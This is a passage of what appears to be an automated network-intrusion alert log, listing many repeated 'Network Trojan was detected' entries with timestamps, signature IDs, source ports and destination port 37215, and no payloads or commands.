                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.832032
                  SID:2829579
                  Source Port:33850
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.139593
                  SID:2835222
                  Source Port:40650
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.349242
                  SID:2829579
                  Source Port:44440
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.472929
                  SID:2835222
                  Source Port:55784
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.813779
                  SID:2829579
                  Source Port:54340
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.348992
                  SID:2835222
                  Source Port:59308
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.900160
                  SID:2829579
                  Source Port:59736
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.790586
                  SID:2835222
                  Source Port:58288
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.518951
                  SID:2829579
                  Source Port:59640
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.913704
                  SID:2835222
                  Source Port:46502
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.285937
                  SID:2835222
                  Source Port:35196
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.184819
                  SID:2835222
                  Source Port:55796
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:31.065728
                  SID:2835222
                  Source Port:43984
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.572693
                  SID:2829579
                  Source Port:48024
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.674109
                  SID:2835222
                  Source Port:49462
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:24.938068
                  SID:2835222
                  Source Port:34388
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.554051
                  SID:2829579
                  Source Port:48222
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.476455
                  SID:2835222
                  Source Port:54066
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:51.995673
                  SID:2835222
                  Source Port:53924
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.721350
                  SID:2829579
                  Source Port:58754
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.821623
                  SID:2835222
                  Source Port:44580
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.716869
                  SID:2835222
                  Source Port:40066
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.962795
                  SID:2829579
                  Source Port:52968
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.867086
                  SID:2829579
                  Source Port:52142
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.081710
                  SID:2835222
                  Source Port:42072
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.392573
                  SID:2835222
                  Source Port:37614
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:28.062110
                  SID:2835222
                  Source Port:36630
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:45.603298
                  SID:2835222
                  Source Port:38428
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.702659
                  SID:2829579
                  Source Port:40560
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.851676
                  SID:2829579
                  Source Port:41682
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:31.555848
                  SID:2835222
                  Source Port:48294
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:18.008253
                  SID:2835222
                  Source Port:35498
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.814153
                  SID:2829579
                  Source Port:53556
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.569394
                  SID:2829579
                  Source Port:43500
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.191399
                  SID:2829579
                  Source Port:56612
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.406930
                  SID:2835222
                  Source Port:56240
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.777569
                  SID:2829579
                  Source Port:43708
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:18.015833
                  SID:2835222
                  Source Port:50064
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.142415
                  SID:2829579
                  Source Port:41252
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.520165
                  SID:2829579
                  Source Port:56832
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:03.012568
                  SID:2835222
                  Source Port:46328
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.176375
                  SID:2835222
                  Source Port:57640
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.078859
                  SID:2835222
                  Source Port:50544
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:52.017294
                  SID:2835222
                  Source Port:40246
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.520023
                  SID:2835222
                  Source Port:40544
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.824141
                  SID:2835222
                  Source Port:38042
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.398753
                  SID:2835222
                  Source Port:44932
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.325434
                  SID:2829579
                  Source Port:39938
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.486596
                  SID:2835222
                  Source Port:44356
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.895682
                  SID:2835222
                  Source Port:36642
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.887848
                  SID:2829579
                  Source Port:50482
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.918557
                  SID:2829579
                  Source Port:45606
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.282247
                  SID:2835222
                  Source Port:39750
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.446922
                  SID:2829579
                  Source Port:57298
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.440849
                  SID:2835222
                  Source Port:55602
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.963816
                  SID:2835222
                  Source Port:45424
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:51.924375
                  SID:2835222
                  Source Port:49000
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.872361
                  SID:2829579
                  Source Port:56514
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.234090
                  SID:2835222
                  Source Port:57880
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:20.496994
                  SID:2829579
                  Source Port:41618
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.260181
                  SID:2829579
                  Source Port:49668
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.518117
                  SID:2829579
                  Source Port:41122
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.287711
                  SID:2835222
                  Source Port:43986
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.930940
                  SID:2835222
                  Source Port:60994
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.533066
                  SID:2829579
                  Source Port:37670
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.398717
                  SID:2829579
                  Source Port:32858
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.772556
                  SID:2835222
                  Source Port:57026
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.222748
                  SID:2835222
                  Source Port:50590
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.910333
                  SID:2829579
                  Source Port:45524
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.935877
                  SID:2829579
                  Source Port:51596
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.097626
                  SID:2835222
                  Source Port:47388
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.795487
                  SID:2829579
                  Source Port:38386
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.972432
                  SID:2835222
                  Source Port:40218
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.724469
                  SID:2829579
                  Source Port:45806
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:24.938068
                  SID:2829579
                  Source Port:46358
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.505030
                  SID:2829579
                  Source Port:34754
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.695229
                  SID:2835222
                  Source Port:36868
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:24.976669
                  SID:2835222
                  Source Port:46760
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.888155
                  SID:2835222
                  Source Port:44276
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.822336
                  SID:2829579
                  Source Port:48346
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.908970
                  SID:2829579
                  Source Port:36004
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.872664
                  SID:2829579
                  Source Port:44734
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:03.033670
                  SID:2835222
                  Source Port:41192
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:24.997758
                  SID:2835222
                  Source Port:44374
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:31.507602
                  SID:2829579
                  Source Port:39484
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.630807
                  SID:2829579
                  Source Port:51398
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.641730
                  SID:2829579
                  Source Port:46548
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.499089
                  SID:2835222
                  Source Port:48438
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.432231
                  SID:2835222
                  Source Port:46580
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.836491
                  SID:2829579
                  Source Port:53878
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:51.952619
                  SID:2829579
                  Source Port:51506
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.905585
                  SID:2835222
                  Source Port:58220
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.939725
                  SID:2829579
                  Source Port:54370
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:45.669699
                  SID:2835222
                  Source Port:47920
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.864190
                  SID:2835222
                  Source Port:53112
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.324318
                  SID:2835222
                  Source Port:60718
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.600239
                  SID:2835222
                  Source Port:52732
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.926621
                  SID:2829579
                  Source Port:50656
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.249834
                  SID:2829579
                  Source Port:58204
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.325591
                  SID:2829579
                  Source Port:46974
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.834879
                  SID:2835222
                  Source Port:55930
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.355050
                  SID:2835222
                  Source Port:48764
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.615223
                  SID:2835222
                  Source Port:54954
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.928138
                  SID:2835222
                  Source Port:40892
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.157992
                  SID:2829579
                  Source Port:55186
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.604052
                  SID:2835222
                  Source Port:58510
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.224405
                  SID:2835222
                  Source Port:50536
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:45.624283
                  SID:2835222
                  Source Port:43476
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.440336
                  SID:2829579
                  Source Port:58578
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.856390
                  SID:2829579
                  Source Port:46860
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.872780
                  SID:2835222
                  Source Port:38384
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.147730
                  SID:2835222
                  Source Port:38398
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.623898
                  SID:2835222
                  Source Port:44476
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.538016
                  SID:2829579
                  Source Port:48870
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.826034
                  SID:2835222
                  Source Port:34438
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.177891
                  SID:2829579
                  Source Port:40770
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.795318
                  SID:2829579
                  Source Port:56564
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.839334
                  SID:2835222
                  Source Port:59644
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.664786
                  SID:2835222
                  Source Port:60190
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.302131
                  SID:2835222
                  Source Port:38882
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.511212
                  SID:2835222
                  Source Port:60590
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:45.588243
                  SID:2835222
                  Source Port:37442
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.422305
                  SID:2835222
                  Source Port:46396
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.600322
                  SID:2835222
                  Source Port:49458
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.767213
                  SID:2835222
                  Source Port:35742
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.414315
                  SID:2829579
                  Source Port:32852
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.917896
                  SID:2835222
                  Source Port:58410
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.832527
                  SID:2829579
                  Source Port:57758
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.947642
                  SID:2829579
                  Source Port:40630
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.978865
                  SID:2835222
                  Source Port:50584
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.407360
                  SID:2829579
                  Source Port:36836
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.041321
                  SID:2829579
                  Source Port:45950
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.563022
                  SID:2829579
                  Source Port:56442
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.443855
                  SID:2829579
                  Source Port:55698
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:24.980775
                  SID:2835222
                  Source Port:41880
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.866031
                  SID:2835222
                  Source Port:38990
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.603089
                  SID:2835222
                  Source Port:56882
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:03.007893
                  SID:2835222
                  Source Port:40452
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.392064
                  SID:2829579
                  Source Port:57044
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.444805
                  SID:2829579
                  Source Port:36420
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.911510
                  SID:2829579
                  Source Port:33566
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:52.032840
                  SID:2829579
                  Source Port:39760
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.968527
                  SID:2829579
                  Source Port:42270
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:03.011735
                  SID:2829579
                  Source Port:45176
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.924330
                  SID:2829579
                  Source Port:44698
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.822276
                  SID:2835222
                  Source Port:37354
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.778030
                  SID:2835222
                  Source Port:51804
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.924577
                  SID:2835222
                  Source Port:44566
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.441172
                  SID:2835222
                  Source Port:60688
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.865689
                  SID:2829579
                  Source Port:43010
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.062116
                  SID:2835222
                  Source Port:52902
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.409717
                  SID:2829579
                  Source Port:59868
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.569954
                  SID:2835222
                  Source Port:45076
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.816887
                  SID:2829579
                  Source Port:45692
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.501573
                  SID:2829579
                  Source Port:58250
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:24.983853
                  SID:2835222
                  Source Port:43380
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:45.652225
                  SID:2829579
                  Source Port:53538
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.619988
                  SID:2829579
                  Source Port:53920
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.868553
                  SID:2835222
                  Source Port:60602
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:31.065444
                  SID:2829579
                  Source Port:47310
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.928325
                  SID:2829579
                  Source Port:44132
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:28.115496
                  SID:2835222
                  Source Port:34244
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.554316
                  SID:2835222
                  Source Port:42128
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.197956
                  SID:2835222
                  Source Port:51918
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.544166
                  SID:2835222
                  Source Port:50622
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.805928
                  SID:2835222
                  Source Port:39344
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.646157
                  SID:2835222
                  Source Port:52656
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.022886
                  SID:2829579
                  Source Port:55138
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.822867
                  SID:2835222
                  Source Port:59942
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.129654
                  SID:2829579
                  Source Port:35466
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:31.570253
                  SID:2829579
                  Source Port:32896
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.607971
                  SID:2835222
                  Source Port:48146
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.563593
                  SID:2835222
                  Source Port:38856
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.761940
                  SID:2835222
                  Source Port:48810
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.995767
                  SID:2829579
                  Source Port:36262
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.752135
                  SID:2835222
                  Source Port:49856
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.825628
                  SID:2835222
                  Source Port:38686
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.821479
                  SID:2829579
                  Source Port:55890
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:53.200630
                  SID:2829579
                  Source Port:60066
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.193569
                  SID:2829579
                  Source Port:50110
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.287568
                  SID:2835222
                  Source Port:38350
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.136584
                  SID:2835222
                  Source Port:37448
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.771211
                  SID:2835222
                  Source Port:40652
